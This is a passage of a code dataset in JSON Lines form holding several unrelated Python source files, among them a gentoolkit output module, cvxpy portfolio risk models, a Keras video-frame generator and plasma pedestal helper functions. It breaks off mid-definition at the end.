fontsize=20)\n\tplt.savefig('analisisBivariado/barrio-metros.png') \n\tplt.cla()\n\tplt.clf()\n\n\t# Comuna y MetrosCuadrados\n\tcomunaMetros = obras[[\"Comuna\",\"MetrosCuadrados\"]]\n\tcomunaMetros = comunaMetros.groupby(['Comuna'])[\"MetrosCuadrados\"].sum()\n\tax = comunaMetros.plot.barh(x=\"MetrosCuadrados\", y= \"Comuna\", rot=0, figsize=(15,15), fontsize = 13, title= 'Cantidad de metros cuadrados por barrio')\n\tplt.legend(loc='upper right', fontsize=20)\n\tplt.savefig('analisisBivariado/comuna-metros.png') \n\tplt.cla()\n\tplt.clf()","repo_name":"dhsantos/Calidad-De-Datos","sub_path":"asignaciones/tp-final/analisis_bivariado.py","file_name":"analisis_bivariado.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"23582190207","text":"# Faça um programa que leia um número N e gere um arquivo com N nomes e idades aleatórios\n# Faça uso de duas listas criadas na mão: uma que contenha 20 nomes e outra que contenha 20 sobrenomes\n# Cada linha do arquivo resultante deve conter um nome completo e a sua idade\n# 2. Estenda o exemplo do cadastro para considerar também a altura da pessoa\nimport random\nmy_file = open('arquivo.txt','a')\n\nfirst_name = [\"João\", \"Maria\", \"Pedro\", \"Ana\", \"Lucas\", \"Julia\", \"Fernanda\", \"Rafael\", \"Carolina\", \"Gabriel\",\n \"Mariana\", \"Diego\", \"Camila\", \"Gustavo\", \"Larissa\", \"Rodrigo\", \"Beatriz\", \"Felipe\", \"Amanda\", \"Ricardo\"]\n\nlast_name = [\"Silva\", \"Santos\", \"Souza\", \"Oliveira\", \"Pereira\", \"Almeida\", \"Fernandes\", \"Rodrigues\", \"Costa\",\n \"Gomes\", \"Martins\", \"Rocha\", \"Ribeiro\", \"Cardoso\", \"Nascimento\", \"Melo\", \"Carvalho\", \"Araujo\", \"Moreira\", \"Cavalcanti\"]\n\ndef main():\n amount = int(input(\"Digite quantos nomes quer criar:\"))\n\n for i in range(amount):\n name = first_name[random.randint(0,19)]\n lname = last_name[random.randint(0,19)]\n age = random.randint(0,118)\n size = random.uniform(0.56,2.71)\n my_file.write(f'{name} {lname} {age} anos e {size:.2f}\\n')\n\n my_file.close()\n\nmain()","repo_name":"M0R4LL3Z/LaboratorioDeAlgoritmos2","sub_path":"Aula08/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39816687134","text":"import time\n\nfrom gentoolkit import pprinter as pp\nfrom gentoolkit.formatters import CpvValueWrapper\nfrom gentoolkit.cpv import split_cpv\n\n\ndef nl(lines=1):\n \"\"\"small utility function to print blank lines\n\n @type lines: integer\n @param lines: optional number of blank lines to print\n default = 1\n \"\"\"\n print(\"\\n\" * lines)\n\n\nclass AnalysisPrinter(CpvValueWrapper):\n \"\"\"Printing functions\"\"\"\n\n def __init__(\n self, target, verbose=True, references=None, key_width=1, width=None, prepend=\"\"\n ):\n \"\"\"@param references: list of accepted keywords or\n the system use flags\n \"\"\"\n self.references = references\n self.key_width = key_width\n self.width = width\n self.prepend = prepend\n CpvValueWrapper.__init__(self, cpv_width=key_width, width=width)\n self.set_target(target, verbose)\n\n def set_target(self, target, verbose=True):\n if target in [\"use\"]:\n if verbose:\n self.print_fn = self.print_use_verbose\n else:\n self.print_fn = self.print_use_quiet\n self._format_key = self._format_use_keyword\n elif target in [\"keywords\"]:\n if verbose:\n self.print_fn = self.print_keyword_verbose\n else:\n self.print_fn = self.print_keyword_quiet\n self._format_key = self._format_use_keyword\n elif target in [\"packages\"]:\n if verbose:\n self.print_fn = self.print_pkg_verbose\n else:\n self.print_fn = self.print_pkg_quiet\n self._format_key = self._format_pkg\n\n def __call__(self, key, active, data):\n self._format_key(key, active, data)\n\n def _format_use_keyword(self, key, active, pkgs):\n \"\"\"Determines the stats for key, formats it and\n calls the pre-determined print function\n \"\"\"\n occurred = str(len(pkgs))\n if active in [\"-\", \"~\"]:\n _key = active + key\n else:\n _key = key\n if _key in self.references:\n default = \"default\"\n else:\n default = \".......\"\n count = \" \" * (5 - len(occurred)) + occurred\n pkgs.sort()\n self.print_fn(key, active, default, count, pkgs)\n\n def print_use_verbose(self, key, active, default, count, pkgs):\n \"\"\"Verbosely prints a set of use flag info. including the pkgs\n using them.\n \"\"\"\n _pkgs = pkgs[:]\n if active in [\"+\", \"-\"]:\n _key = pp.useflag((active + key), active == \"+\")\n else:\n _key = \" \" + key\n cpv = _pkgs.pop(0)\n print(\n self.prepend + _key,\n \".\" * (35 - len(key)),\n default,\n pp.number(count),\n pp.cpv(cpv),\n )\n while _pkgs:\n cpv = _pkgs.pop(0)\n print(\" \" * 52 + pp.cpv(cpv))\n\n def print_use_quiet(self, key, active, default, count, pkgs):\n \"\"\"Quietly prints a subset set of USE flag info..\"\"\"\n if active in [\"+\", \"-\"]:\n _key = pp.useflag((active + key), active == \"+\")\n else:\n _key = \" \" + key\n print(self.prepend + _key, \".\" * (35 - len(key)), default, pp.number(count))\n\n def print_keyword_verbose(self, key, stability, default, count, pkgs):\n \"\"\"Verbosely prints a set of keywords info. including the pkgs\n using them.\n \"\"\"\n _pkgs = pkgs[:]\n _key = pp.keyword(\n (stability + key), stable=(stability == \" \"), hard_masked=stability == \"-\"\n )\n cpv = _pkgs.pop(0)\n print(\n self.prepend + _key,\n \".\" * (20 - len(key)),\n default,\n pp.number(count),\n pp.cpv(cpv),\n )\n while _pkgs:\n cpv = _pkgs.pop(0)\n print(\" \" * 37 + pp.cpv(cpv))\n\n def print_keyword_quiet(self, key, stability, default, count, pkgs):\n \"\"\"Quietly prints a subset set of USE flag info..\"\"\"\n _key = pp.keyword(\n (stability + key), stable=(stability == \" \"), hard_masked=stability == \"-\"\n )\n print(self.prepend + _key, \".\" * (20 - len(key)), default, pp.number(count))\n\n def _format_pkg(self, key, active, flags):\n \"\"\"Determines the stats for key, formats it and\n calls the pre-determined print function\n \"\"\"\n (plus, minus, cleaned) = flags\n _plus = []\n _minus = []\n _cleaned = []\n for flag in plus:\n _flag = flag.strip()\n if _flag:\n _plus.append(_flag)\n for flag in minus:\n _flag = flag.strip()\n if _flag:\n _minus.append(_flag)\n for flag in cleaned:\n _flag = flag.strip()\n if _flag:\n _cleaned.append(_flag)\n # print(\"cpv=\", key, \"_plus=\", _plus, \"_minus=\", _minus)\n self.print_fn(self.prepend + key, (plus, minus, cleaned))\n\n def print_pkg_verbose(self, cpv, flags):\n \"\"\"Verbosely prints the pkg's use flag info.\"\"\"\n (plus, minus, unset) = flags\n _flags = []\n for flag in plus:\n _flags.append(pp.useflag((flag), True))\n for flag in minus:\n _flags.append(pp.useflag((\"-\" + flag), False))\n for flag in unset:\n _flags.append(pp.globaloption(\"-\" + flag))\n\n print(self._format_values(cpv, \", \".join(_flags)))\n\n def print_pkg_quiet(self, cpv, flags):\n \"\"\"Verbosely prints the pkg's use flag info.\"\"\"\n (plus, minus, unset) = flags\n _flags = []\n for flag in plus:\n _flags.append(pp.useflag((flag), True))\n for flag in minus:\n _flags.append(pp.useflag((\"-\" + flag), False))\n for flag in unset:\n _flags.append(pp.globaloption(\"-\" + flag))\n\n print(self._format_values(cpv, \", \".join(_flags)))\n\n\nclass RebuildPrinter(CpvValueWrapper):\n \"\"\"Output functions\"\"\"\n\n def __init__(\n self, target, pretend=True, exact=False, slot=False, key_width=1, width=None\n ):\n \"\"\"@param references: list of accepted keywords or\n the system use flags\n \"\"\"\n self.target = target\n self.set_target(target)\n self.pretend = pretend\n CpvValueWrapper.__init__(self, cpv_width=key_width, width=width)\n if pretend:\n self.spacer = \" \"\n self.init_indent = len(self.spacer)\n else:\n self.spacer = \"\"\n self.exact = exact\n self.slot = slot\n self.data = {}\n\n def set_target(self, target):\n if target in [\"use\"]:\n self.print_fn = self.print_use\n elif target in [\"keywords\"]:\n self.print_fn = self.print_keyword\n elif target in [\"unmask\"]:\n self.print_fn = self.print_mask\n self.lines = [self.header()]\n\n def __call__(self, key, values, cp_count):\n if self.target in [\"keywords\", \"use\"]:\n self._format_atoms(key, values, cp_count)\n else:\n self._format_key(key, values)\n\n def _format_key(self, key, values):\n \"\"\"Determines the stats for key, formats it and\n calls the pre-determined print function\n \"\"\"\n if self.exact:\n _key = \"=\" + key\n else:\n parts = split_cpv(key)\n _key = \"/\".join(parts[:2])\n values.sort()\n self.data[_key] = values\n self.print_fn(_key, values)\n\n def print_use(self, key, atom=None, values=None):\n \"\"\"Prints a USE flag string.\"\"\"\n if atom and not values:\n values = atom.use\n if self.pretend:\n flags = []\n for flag in values:\n flags.append(pp.useflag(flag, (flag[0] != \"-\")))\n print(self._format_values(self.spacer + key, \" \".join(flags)))\n else:\n line = \" \".join([key, \" \".join(values)])\n self.lines.append(line)\n\n def _format_atoms(self, key, atoms, count):\n \"\"\"Determines if there are more than one atom in the values and\n calls the predetermined print function for each atom.\n \"\"\"\n # print(\"_format_atoms(),\", key, atoms)\n if self.exact:\n for atom in atoms:\n self.print_fn(str(atom), atom=atom)\n return\n # print(\"_format_atoms(), count =\", count)\n if self.slot or count > 1:\n for atom in atoms:\n _key = str(atom.cp) + \":\" + atom.slot\n self.print_fn(_key, atom=atom)\n else:\n for atom in atoms:\n _key = str(atom.cp)\n self.print_fn(_key, atom=atom)\n return\n\n def print_keyword(self, key, atom=None, keyword=None):\n \"\"\"prints a pkg key and a keyword\"\"\"\n # print(\"print_keyword(),\", key, keyword)\n if atom and not keyword:\n keyword = atom.keyword\n if self.pretend:\n print(self._format_values(key, keyword))\n else:\n line = \" \".join([key, keyword])\n self.lines.append(line)\n\n def print_unmask(self):\n pass\n\n def header(self):\n \"\"\"Generates a file header\"\"\"\n\n h = (\n \"# This package.%s file was generated by \" % self.target\n + \"gentoolkit's 'enalyze rebuild' module\\n\"\n \"# Date: \" + time.asctime() + \"\\n\"\n )\n return h\n","repo_name":"gentoo/gentoolkit","sub_path":"pym/gentoolkit/enalyze/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":9387,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"47"} +{"seq_id":"43298781845","text":"import os\nimport sys\nimport pygame\nimport random\n\nfrom constants import *\n\nclass Chapter(object):\n def __init__(self, inName, inMap, inStartingPos, inObstacles):\n\n self.name = inName\n self.startingPos = inStartingPos\n\n self.createMapFromStrings(inMap)\n self.obstacles = inObstacles\n\n def createMapFromStrings(self, inMap):\n self.map = []\n\n for y in range(len(inMap)):\n self.map.append([])\n for x in range(0, len(inMap[y]), 2):\n temp = inMap[y][x:x+2]\n self.map[y].append(temp)\n","repo_name":"Wopple/Mage","sub_path":"chapter.py","file_name":"chapter.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"21283794880","text":"from abc import abstractmethod\n\nimport cvxpy as cvx\nimport numpy as np\nimport pandas as pd\nimport datetime as dt\nfrom optimizationCosts import BaseCost\n\n__all__ = ['FullSigma', 'RobustSigma']\n\n\ndef locator(obj, t):\n \"\"\"Picks last element before t.\"\"\"\n try:\n if isinstance(obj, pd.Panel):\n return obj.iloc[obj.axes[0].get_loc(t, method='pad')]\n\n elif isinstance(obj.index, pd.MultiIndex):\n prev_t = obj.loc[:t, :].index.values[-1][0]\n else:\n return obj#.loc[prev_t, :]\n\n except AttributeError: # obj not pandas\n return obj\n\n\nclass BaseRiskModel(BaseCost):\n\n def __init__(self, **kwargs):\n self.w_bench = kwargs.pop('w_bench', 0.)\n super(BaseRiskModel, self).__init__()\n self.gamma_half_life = kwargs.pop('gamma_half_life', np.inf)\n\n def weight_expr(self, t, w_plus, z, value):\n self.expression = self._estimate(t, w_plus, z, value)\n return self.gamma * self.expression, []\n\n @abstractmethod\n def _estimate(self, t, w_plus, z, value):\n return NotImplemented\n\n def weight_expr_ahead(self, t, tau, w_plus, z, value):\n \"\"\"Estimate risk model at time tau in the future.\"\"\"\n if self.gamma_half_life == np.inf:\n gamma_multiplier = 1.\n else:\n decay_factor = 2 ** (-1 / self.gamma_half_life)\n # TODO not dependent on days\n gamma_init = decay_factor ** ((tau - t).days)\n gamma_multiplier = gamma_init * \\\n (1 - decay_factor) / (1 - decay_factor)\n return gamma_multiplier * self.weight_expr(t, w_plus, z, value)[0], []\n\n def optimization_log(self, t):\n if self.expression.value:\n return self.expression.value\n else:\n return np.NaN\n\n\nclass FullSigma(BaseRiskModel):\n \"\"\"Quadratic risk model with full covariance matrix.\n\n Args:\n Sigma (:obj:`pd.Panel`): Panel of Sigma matrices,\n or single matrix.\n\n \"\"\"\n\n def __init__(self, Sigma, **kwargs):\n self.Sigma = Sigma # Sigma is either a matrix or a pd.Panel\n try:\n assert(not pd.isnull(Sigma).values.any())\n except AttributeError:\n assert (not pd.isnull(Sigma).any())\n super(FullSigma, self).__init__(**kwargs)\n\n def _estimate(self, t, wplus, z, value):\n self.expression = cvx.quad_form(z, locator(self.Sigma, t+dt.timedelta(hours=1)).values) \n return self.expression\n\n\n\n\n\n\nclass RobustSigma(BaseRiskModel):\n \"\"\"Implements covariance forecast error risk.\"\"\"\n\n def __init__(self, Sigma, epsilon, **kwargs):\n self.Sigma = Sigma # pd.Panel or matrix\n self.epsilon = epsilon # pd.Series or scalar\n super(RobustSigma, self).__init__(**kwargs)\n\n def _estimate(self, t, wplus, z, value):\n testing=locator(self.Sigma, t)\n \n \n self.expression = cvx.quad_form(wplus, self.Sigma) + \\\n locator(self.epsilon, t) * \\\n (cvx.abs(wplus).T * np.diag(self.Sigma))**2\n\n return self.expression\n\n\n","repo_name":"ahmedaley/SpotWeb","sub_path":"SpotWeb/optimizationRisks.py","file_name":"optimizationRisks.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"2197419049","text":"import csv\nimport os\nimport glob\nimport warnings\n\nimport numpy as np\nimport keras.backend as K\nfrom keras.preprocessing.image import Iterator, load_img, img_to_array, ImageDataGenerator, \\\n transform_matrix_offset_center, apply_transform, random_channel_shift, flip_axis, array_to_img\n\nfrom thirdp.harvitronix.extract.csv_file_constats import CLASS_INDEX\n\nclass SequenceImageGenerator(object):\n \"\"\"Generate minibatches of image sequnces data (e.g. video sample) with real-time data augmentation.\n\n # Arguments\n featurewise_center: set input mean to 0 over the dataset.\n samplewise_center: set each sample mean to 0.\n featurewise_std_normalization: divide inputs by std of the dataset.\n samplewise_std_normalization: divide each input by its std.\n zca_whitening: apply ZCA whitening.\n zca_epsilon: epsilon for ZCA whitening. Default is 1e-6.\n rotation_range: degrees (0 to 180).\n width_shift_range: fraction of total width.\n height_shift_range: fraction of total height.\n shear_range: shear intensity (shear angle in radians).\n zoom_range: amount of zoom. if scalar z, zoom will be randomly picked\n in the range [1-z, 1+z]. A sequence of two can be passed instead\n to select this range.\n channel_shift_range: shift range for each channels.\n fill_mode: points outside the boundaries are filled according to the\n given mode ('constant', 'nearest', 'reflect' or 'wrap'). Default\n is 'nearest'.\n cval: value used for points outside the boundaries when fill_mode is\n 'constant'. Default is 0.\n horizontal_flip: whether to randomly flip images horizontally.\n vertical_flip: whether to randomly flip images vertically.\n rescale: rescaling factor. If None or 0, no rescaling is applied,\n otherwise we multiply the data by the value provided. This is\n applied after the `preprocessing_function` (if any provided)\n but before any other transformation.\n preprocessing_function: function that will be implied on each input.\n The function will run before any other modification on it.\n The function should take one argument:\n one image (Numpy tensor with rank 3),\n and should output a Numpy tensor with the same shape.\n data_format: 'channels_first' or 'channels_last'. In 'channels_first' mode, the channels dimension\n (the depth) is at index 1, in 'channels_last' mode it is at index 3.\n It defaults to the `image_data_format` value found in your\n Keras config file at `~/.keras/keras.json`.\n If you never set it, then it will be \"channels_last\".\n \"\"\"\n\n def __init__(self, rescale=None):\n self.rescale = rescale\n self.image_data_generator = ImageDataGenerator(rescale=rescale)\n return\n\n def standardize(self, x):\n \"\"\"Apply the normalization configuration to a batch of inputs.\n\n # Arguments\n x: batch of inputs to be normalized.\n\n # Returns\n The inputs, normalized.\n \"\"\"\n if self.preprocessing_function:\n x = self.preprocessing_function(x)\n if self.rescale:\n x *= self.rescale\n # x is a single image, so it doesn't have image number at index 0\n img_channel_axis = self.channel_axis - 1\n if self.samplewise_center:\n x -= np.mean(x, axis=img_channel_axis, keepdims=True)\n if self.samplewise_std_normalization:\n x /= (np.std(x, axis=img_channel_axis, keepdims=True) + 1e-7)\n\n if self.featurewise_center:\n if self.mean is not None:\n x -= self.mean\n else:\n warnings.warn('This ImageDataGenerator specifies '\n '`featurewise_center`, but it hasn\\'t'\n 'been fit on any training data. Fit it '\n 'first by calling `.fit(numpy_data)`.')\n if self.featurewise_std_normalization:\n if self.std is not None:\n x /= (self.std + 1e-7)\n else:\n warnings.warn('This ImageDataGenerator specifies '\n '`featurewise_std_normalization`, but it hasn\\'t'\n 'been fit on any training data. Fit it '\n 'first by calling `.fit(numpy_data)`.')\n if self.zca_whitening:\n if self.principal_components is not None:\n flatx = np.reshape(x, (-1, np.prod(x.shape[-3:])))\n whitex = np.dot(flatx, self.principal_components)\n x = np.reshape(whitex, x.shape)\n else:\n warnings.warn('This ImageDataGenerator specifies '\n '`zca_whitening`, but it hasn\\'t'\n 'been fit on any training data. Fit it '\n 'first by calling `.fit(numpy_data)`.')\n return x\n\n def random_transform(self, x, seed=None):\n \"\"\"Randomly augment a single image tensor.\n\n # Arguments\n x: 3D tensor, single image.\n seed: random seed.\n\n # Returns\n A randomly transformed version of the input (same shape).\n \"\"\"\n # x is a single image, so it doesn't have image number at index 0\n img_row_axis = self.row_axis - 1\n img_col_axis = self.col_axis - 1\n img_channel_axis = self.channel_axis - 1\n\n if seed is not None:\n np.random.seed(seed)\n\n # use composition of homographies\n # to generate final transform that needs to be applied\n if self.rotation_range:\n theta = np.pi / 180 * np.random.uniform(-self.rotation_range, self.rotation_range)\n else:\n theta = 0\n\n if self.height_shift_range:\n tx = np.random.uniform(-self.height_shift_range, self.height_shift_range) * x.shape[img_row_axis]\n else:\n tx = 0\n\n if self.width_shift_range:\n ty = np.random.uniform(-self.width_shift_range, self.width_shift_range) * x.shape[img_col_axis]\n else:\n ty = 0\n\n if self.shear_range:\n shear = np.random.uniform(-self.shear_range, self.shear_range)\n else:\n shear = 0\n\n if self.zoom_range[0] == 1 and self.zoom_range[1] == 1:\n zx, zy = 1, 1\n else:\n zx, zy = np.random.uniform(self.zoom_range[0], self.zoom_range[1], 2)\n\n transform_matrix = None\n if theta != 0:\n rotation_matrix = np.array([[np.cos(theta), -np.sin(theta), 0],\n [np.sin(theta), np.cos(theta), 0],\n [0, 0, 1]])\n transform_matrix = rotation_matrix\n\n if tx != 0 or ty != 0:\n shift_matrix = np.array([[1, 0, tx],\n [0, 1, ty],\n [0, 0, 1]])\n transform_matrix = shift_matrix if transform_matrix is None else np.dot(transform_matrix, shift_matrix)\n\n if shear != 0:\n shear_matrix = np.array([[1, -np.sin(shear), 0],\n [0, np.cos(shear), 0],\n [0, 0, 1]])\n transform_matrix = shear_matrix if transform_matrix is None else np.dot(transform_matrix, shear_matrix)\n\n if zx != 1 or zy != 1:\n zoom_matrix = np.array([[zx, 0, 0],\n [0, zy, 0],\n [0, 0, 1]])\n transform_matrix = zoom_matrix if transform_matrix is None else np.dot(transform_matrix, zoom_matrix)\n\n if transform_matrix is not None:\n h, w = x.shape[img_row_axis], x.shape[img_col_axis]\n transform_matrix = transform_matrix_offset_center(transform_matrix, h, w)\n x = apply_transform(x, transform_matrix, img_channel_axis,\n fill_mode=self.fill_mode, cval=self.cval)\n\n if self.channel_shift_range != 0:\n x = random_channel_shift(x,\n self.channel_shift_range,\n img_channel_axis)\n if self.horizontal_flip:\n if np.random.random() < 0.5:\n x = flip_axis(x, img_col_axis)\n\n if self.vertical_flip:\n if np.random.random() < 0.5:\n x = flip_axis(x, img_row_axis)\n\n return x\n\n def flow(self, x, y=None, batch_size=32, shuffle=True, seed=None,\n save_to_dir=None, save_prefix='', save_format='png'):\n raise Exception(\"Unsupported operation!\")\n\n def flow_from_directory(self, directory,\n target_size=(256, 256), color_mode='rgb',\n classes=None, class_mode='categorical',\n batch_size=32, shuffle=True, seed=None,\n save_to_dir=None,\n save_prefix='',\n save_format='png',\n follow_links=False):\n raise Exception(\"Unsupported operation!\")\n\n def flow_from_csv(self, csv_file_path, is_train,batch_size,save_to_dir=None,target_size=(112,112),nb_seq=16):\n return CsvFileIterator(csv_file_path, is_train,batch_size=batch_size, target_size=target_size,nb_seq=nb_seq,\n image_data_generator = self.image_data_generator, shuffle=is_train,save_to_dir=save_to_dir)\n\n\nclass CsvFileIterator(Iterator):\n \"\"\"Iterator capable of reading images from a csv file.\n\n # Arguments\n directory: Path to the directory to read images from.\n Each subdirectory in this directory will be\n considered to contain images from one class,\n or alternatively you could specify class subdirectories\n via the `classes` argument.\n image_data_generator: Instance of `ImageDataGenerator`\n to use for random transformations and normalization.\n target_size: tuple of integers, dimensions to resize input images to.\n color_mode: One of `\"rgb\"`, `\"grayscale\"`. Color mode to read images.\n classes: Optional list of strings, names of sudirectories\n containing images from each class (e.g. `[\"dogs\", \"cats\"]`).\n It will be computed automatically if not set.\n class_mode: Mode for yielding the targets:\n `\"binary\"`: binary targets (if there are only two classes),\n `\"categorical\"`: categorical targets,\n `\"sparse\"`: integer targets,\n `\"input\"`: targets are images identical to input images (mainly\n used to work with autoencoders),\n `None`: no targets get yielded (only input images are yielded).\n batch_size: Integer, size of a batch.\n shuffle: Boolean, whether to shuffle the data between epochs.\n seed: Random seed for data shuffling.\n data_format: String, one of `channels_first`, `channels_last`.\n save_to_dir: Optional directory where to save the pictures\n being yielded, in a viewable format. This is useful\n for visualizing the random transformations being\n applied, for debugging purposes.\n save_prefix: String prefix to use for saving sample\n images (if `save_to_dir` is set).\n save_format: Format to use for saving sample images\n (if `save_to_dir` is set).\n \"\"\"\n\n def __init__(self, csv_file_path, is_train, image_data_generator, target_size=(256, 256), color_mode='rgb',\n classes=None, class_mode='categorical',nb_seq=16,\n batch_size=32, shuffle=True, seed=None,\n data_format=None,\n save_to_dir=None, save_prefix='', save_format='png'):\n if data_format is None:\n data_format = K.image_data_format()\n self.csv_file_path = csv_file_path\n self.target_size = tuple(target_size)\n self.image_data_generator = image_data_generator\n if color_mode not in {'rgb', 'grayscale'}:\n raise ValueError('Invalid color mode:', color_mode,\n '; expected \"rgb\" or \"grayscale\".')\n self.color_mode = color_mode\n self.data_format = data_format\n if self.color_mode == 'rgb':\n if self.data_format == 'channels_last':\n self.image_shape = self.target_size + (3,)\n else:\n self.image_shape = (3,) + self.target_size\n else:\n if self.data_format == 'channels_last':\n self.image_shape = self.target_size + (1,)\n else:\n self.image_shape = (1,) + self.target_size\n self.classes = classes\n if class_mode not in {'categorical'}:\n raise ValueError('Invalid class_mode:', class_mode,\n '; expected one of \"categorical\"')\n self.class_mode = class_mode\n self.save_to_dir = save_to_dir\n self.save_prefix = save_prefix\n self.save_format = save_format\n\n self.data = CsvFileIterator.get_data(csv_file_path, is_train)\n\n # first, count the number of samples and classes\n self.samples = len(self.data)\n\n if not classes:\n classes = CsvFileIterator.get_classes(self.data)\n\n self.num_class = len(classes)\n self.class_indices = dict(zip(classes, range(len(classes))))\n\n print('Found %d images belonging to %d classes.' % (self.samples, self.num_class))\n\n # second, build an index of the images in the different class subfolders\n results = []\n\n self.sample_names = []\n self.classes = np.zeros((self.samples,), dtype='int32')\n self.data_dir = os.path.dirname(csv_file_path)\n self.nb_seq=nb_seq\n for idx, sample in enumerate(self.data):\n type, _class, filename, _ = sample\n self.classes[idx] = self.class_indices[_class]\n self.sample_names.append(self.data_dir+'/'+ type + '/' + _class + '/' + filename)\n\n super(CsvFileIterator, self).__init__(self.samples, batch_size, shuffle, seed)\n\n @staticmethod\n def get_data(data_file, is_train):\n \"\"\"Load our data from file.\"\"\"\n with open(data_file, 'r') as fin:\n reader = csv.reader(fin)\n data = list(reader)\n\n res = []\n target_type = 'Train' if is_train else 'Val'\n for sample in data:\n type, _, _, nb_sub_samples = sample\n if type == target_type and int(nb_sub_samples)>0:\n res.append(sample)\n\n return res\n\n @staticmethod\n def get_classes(data):\n \"\"\"Extract the classes from our data. If we want to limit them,\n only return the classes we need.\"\"\"\n classes = []\n for item in data:\n if item[CLASS_INDEX] not in classes:\n classes.append(item[CLASS_INDEX])\n\n # Sort them.\n classes = sorted(classes)\n\n # Return.\n return classes\n\n def get_sub_sample_paths(self, sample_path):\n \"\"\"Given a path to sample (filename without extension and index), build our sample or in other name sub sample sequence.\n\n e.g. given C:/data/Val/angray/1\n return C:/data/Val/angray/1_001.jpg,C:/data/Val/angray/1_002.jpg,C:/data/Val/angray/1_003.jpg,..\n \"\"\"\n sub_samples = sorted(glob.glob(sample_path + '*jpg'))\n\n return sub_samples\n\n def next(self):\n \"\"\"For python 2.x.\n\n # Returns\n The next batch.\n \"\"\"\n with self.lock:\n index_array, current_index, current_batch_size = next(self.index_generator)\n\n return self._get_batches_of_transformed_samples(index_array)\n\n\n def _get_batches_of_transformed_samples(self, index_array):\n\n current_batch_size=len(index_array)\n\n # The transformation of images is not under thread lock\n # so it can be done in parallel\n batch_x = np.zeros((current_batch_size, self.nb_seq,) + self.image_shape, dtype=K.floatx())\n grayscale = self.color_mode == 'grayscale'\n # build batch of image data\n for i, j in enumerate(index_array):\n sname = self.sample_names[j]\n sub_sample_paths = self.get_sub_sample_paths(sname)\n sample = []\n\n for sub_sample_path in sub_sample_paths:\n sub_sample = load_img(sub_sample_path,\n grayscale=grayscale,\n target_size=self.target_size)\n x = img_to_array(sub_sample, data_format=self.data_format)\n x = self.image_data_generator.random_transform(x)\n x = self.image_data_generator.standardize(x)\n sample.append(x)\n batch_x[i] = np.array(sample)\n # optionally save augmented images to disk for debugging purposes\n if self.save_to_dir:\n for i in range(current_batch_size):\n for seq_idx in range(len(batch_x[i])):\n img = array_to_img(batch_x[i][seq_idx], self.data_format, scale=True)\n fname = 'clss{_class}_{prefix}_{subindex}_{hash}.{format}'.format(\n _class=self.classes[index_array],\n prefix=self.save_prefix,\n subindex=seq_idx,\n hash=np.random.randint(1e4),\n format=self.save_format)\n img.save(os.path.join(self.save_to_dir, fname))\n # build batch of labels\n batch_y = np.zeros((len(batch_x), self.num_class), dtype=K.floatx())\n for i, label in enumerate(self.classes[index_array]):\n batch_y[i, label] = 1.\n\n return batch_x, batch_y\n","repo_name":"habanoz/deep-emotion-recognition-src","sub_path":"util/generator/SequenceImageGenerator.py","file_name":"SequenceImageGenerator.py","file_ext":"py","file_size_in_byte":17871,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"38532486513","text":"import torch \nimport numpy as np \n\nboltzmann_constant = 1.380e-23\nmu_0 = 1.256e-6 \n\ndef find_tesep(profs): \n ne, te = profs[:, 0], profs[:, 1]\n teseps, neseps, rseps = np.empty(te.shape[0]), np.empty(te.shape[0]), np.empty(te.shape[0])\n for k, (ne_slice, te_slice) in enumerate(zip(ne, te)): \n l_idx, r_idx = 0, 1\n while te_slice[r_idx] > 100: \n l_idx += 1\n r_idx += 1 \n if r_idx == 50:# or (len(te_slice) == 60 and r_idx == 60): \n break \n\n if r_idx == 50:\n continue \n weights_r, weights_l = get_weights(te_slice, l_idx, r_idx)\n tesep_estimation = weights_l*te_slice[l_idx] + weights_r*te_slice[r_idx]\n nesep_estimation = weights_l*ne_slice[l_idx] + weights_r*ne_slice[r_idx]\n # rsep_estimation = weights_l*r_slice[l_idx] + weights_r*r_slice[r_idx]\n teseps[k] = tesep_estimation\n neseps[k] = nesep_estimation\n rseps[k] = l_idx\n # rsep_estimation = weights_l*x[idx_l] + weights_r*x[idx_r]\n return teseps, neseps, rseps\n\ndef get_weights(te, idx_l, idx_r, query=100):\n # Gets weighst as usual\n dist = te[idx_r] - query + query - te[idx_l]\n weights = (1-(te[idx_r] - query)/dist, 1-(query - te[idx_l])/dist)\n return weights\n\ndef static_pressure_stored_energy_approximation(profs):\n if not isinstance(profs, torch.Tensor): \n profs = torch.from_numpy(profs)\n return boltzmann_constant*torch.prod(profs, 1).sum(1)\ndef torch_shaping_approx(minor_radius, tri_u, tri_l, elongation):\n triangularity = (tri_u + tri_l) / 2.0\n b = elongation*minor_radius\n gamma_top = -(minor_radius + triangularity)\n gamma_bot = minor_radius - triangularity\n alpha_top = -gamma_top / (b*b)\n alpha_bot = -gamma_bot / (b*b)\n top_int = (torch.arcsinh(2*torch.abs(alpha_top)*b) + 2*torch.abs(alpha_top)*b*torch.sqrt(4*alpha_top*alpha_top*b*b+1)) / (2*torch.abs(alpha_top))\n bot_int = (torch.arcsinh(2*torch.abs(alpha_bot)*b) + 2*torch.abs(alpha_bot)*b*torch.sqrt(4*alpha_bot*alpha_bot*b*b+1)) / (2*torch.abs(alpha_bot))\n return bot_int + top_int \n\ndef bpol_approx(minor_radius, tri_u, tri_l, elongation, current): \n shaping = torch_shaping_approx(minor_radius, tri_u, tri_l, elongation)\n return mu_0*current / shaping\n\ndef calculate_peped(profs): \n if not isinstance(profs, torch.Tensor): \n profs = torch.from_numpy(profs)\n ne = profs[:, 0:1, :]\n te = profs[:, 1:, :]\n p = boltzmann_constant*ne*te\n second_diff = torch.diff(p, n=2, dim=-1)\n min_diff_val, min_diff_idx = torch.min(second_diff, dim=-1)\n ped_loc = min_diff_idx -2\n peped = torch.zeros((len(p)))\n for k in range(len(peped)): \n peped[k] = torch.select(p[k], dim=-1, index=ped_loc[k].item()) \n return peped, ped_loc\ndef 